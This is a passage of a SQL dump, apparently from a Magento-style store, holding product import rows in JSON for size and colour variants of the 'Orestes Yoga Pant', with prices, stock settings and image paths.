Individually\",\"price\":\"66\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"orestes-yoga-pant-32-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp10-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp10-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp10-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=32,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/p\\/mp10-black_alt1.jpg,\\/m\\/p\\/mp10-black_back.jpg\",\"image\":\"\\/m\\/p\\/mp10-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp10-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/p\\/mp10-black_alt1.jpg,\\/m\\/p\\/mp10-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"32\",\"color\":\"Black\"},\"796\":{\"sku\":\"MP10-32-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Orestes Yoga Pant -32-Blue\",\"description\":\"<p>The Orestes Yoga Pant is a yoga basic that sustains the novice yogi well into the expert stage. Organic sustainable cotton and 9% stretch spandex let your body bend to your will while your conscience stays clear.<\\/p>\\n<p>&bull; A yoga essential.<br \\/>&bull; Breathable stretch organic cotton\\/spandex.<br \\/>&bull; Standard Fit.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"66\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"orestes-yoga-pant-32-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp10-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp10-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp10-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=32,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/p\\/mp10-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp10-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"32\",\"color\":\"Blue\"},\"797\":{\"sku\":\"MP10-32-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Orestes Yoga Pant -32-Green\",\"description\":\"<p>The Orestes Yoga Pant is a yoga basic that sustains the novice yogi well into the expert stage. Organic sustainable cotton and 9% stretch spandex let your body bend to your will while your conscience stays clear.<\\/p>\\n<p>&bull; A yoga essential.<br \\/>&bull; Breathable stretch organic cotton\\/spandex.<br \\/>&bull; Standard Fit.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"66\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"orestes-yoga-pant-32-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp10-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp10-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp10-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=32,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/p\\/mp10-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp10-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"32\",\"color\":\"Green\"},\"798\":{\"sku\":\"MP10-33-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Orestes Yoga Pant -33-Black\",\"description\":\"<p>The Orestes Yoga Pant is a yoga basic that sustains the novice yogi well into the expert stage. Organic sustainable cotton and 9% stretch spandex let your body bend to your will while your conscience stays clear.<\\/p>\\n<p>&bull; A yoga essential.<br \\/>&bull; Breathable stretch organic cotton\\/spandex.<br \\/>&bull; Standard Fit.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"66\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"orestes-yoga-pant-33-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp10-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp10-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp10-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=33,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/p\\/mp10-black_alt1.jpg,\\/m\\/p\\/mp10-black_back.jpg\",\"image\":\"\\/m\\/p\\/mp10-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp10-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/p\\/mp10-black_alt1.jpg,\\/m\\/p\\/mp10-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"33\",\"color\":\"Black\"},\"799\":{\"sku\":\"MP10-33-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Orestes Yoga Pant -33-Blue\",\"description\":\"<p>The Orestes Yoga Pant is a yoga basic that sustains the novice yogi well into the expert stage. Organic sustainable cotton and 9% stretch spandex let your body bend to your will while your conscience stays clear.<\\/p>\\n<p>&bull; A yoga essential.<br \\/>&bull; Breathable stretch organic cotton\\/spandex.<br \\/>&bull; Standard Fit.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"66\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"orestes-yoga-pant-33-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp10-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp10-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp10-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=33,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/p\\/mp10-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp10-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"33\",\"color\":\"Blue\"}}');
INSERT INTO `importexport_importdata` (`id`, `entity`, `behavior`, `data`) VALUES
(9, 'catalog_product', 'append', '{\"800\":{\"sku\":\"MP10-33-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Orestes Yoga Pant -33-Green\",\"description\":\"<p>The Orestes Yoga Pant is a yoga basic that sustains the novice yogi well into the expert stage. Organic sustainable cotton and 9% stretch spandex let your body bend to your will while your conscience stays clear.<\\/p>\\n<p>&bull; A yoga essential.<br \\/>&bull; Breathable stretch organic cotton\\/spandex.<br \\/>&bull; Standard Fit.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"66\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"orestes-yoga-pant-33-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp10-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp10-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp10-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=33,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/p\\/mp10-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp10-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"33\",\"color\":\"Green\"},\"801\":{\"sku\":\"MP10-34-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Orestes Yoga Pant -34-Black\",\"description\":\"<p>The Orestes Yoga Pant is a yoga basic that sustains the novice yogi well into the expert stage. Organic sustainable cotton and 9% stretch spandex let your body bend to your will while your conscience stays clear.<\\/p>\\n<p>&bull; A yoga essential.<br \\/>&bull; Breathable stretch organic cotton\\/spandex.<br \\/>&bull; Standard Fit.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"66\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"orestes-yoga-pant-34-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp10-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp10-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp10-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=34,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/p\\/mp10-black_alt1.jpg,\\/m\\/p\\/mp10-black_back.jpg\",\"image\":\"\\/m\\/p\\/mp10-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp10-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/p\\/mp10-black_alt1.jpg,\\/m\\/p\\/mp10-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"34\",\"color\":\"Black\"},\"802\":{\"sku\":\"MP10-34-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Orestes Yoga Pant -34-Blue\",\"description\":\"<p>The Orestes Yoga Pant is a yoga basic that sustains the novice yogi well into the expert stage. Organic sustainable cotton and 9% stretch spandex let your body bend to your will while your conscience stays clear.<\\/p>\\n<p>&bull; A yoga essential.<br \\/>&bull; Breathable stretch organic cotton\\/spandex.<br \\/>&bull; Standard Fit.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"66\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"orestes-yoga-pant-34-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp10-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp10-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp10-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=34,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/p\\/mp10-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp10-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"34\",\"color\":\"Blue\"},\"803\":{\"sku\":\"MP10-34-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Orestes Yoga Pant -34-Green\",\"description\":\"<p>The Orestes Yoga Pant is a yoga basic that sustains the novice yogi well into the expert stage. Organic sustainable cotton and 9% stretch spandex let your body bend to your will while your conscience stays clear.<\\/p>\\n<p>&bull; A yoga essential.<br \\/>&bull; Breathable stretch organic cotton\\/spandex.<br \\/>&bull; Standard Fit.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"66\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"orestes-yoga-pant-34-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp10-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp10-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp10-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=34,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/p\\/mp10-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp10-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"34\",\"color\":\"Green\"},\"804\":{\"sku\":\"MP10-36-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/Erin Recommends,Default 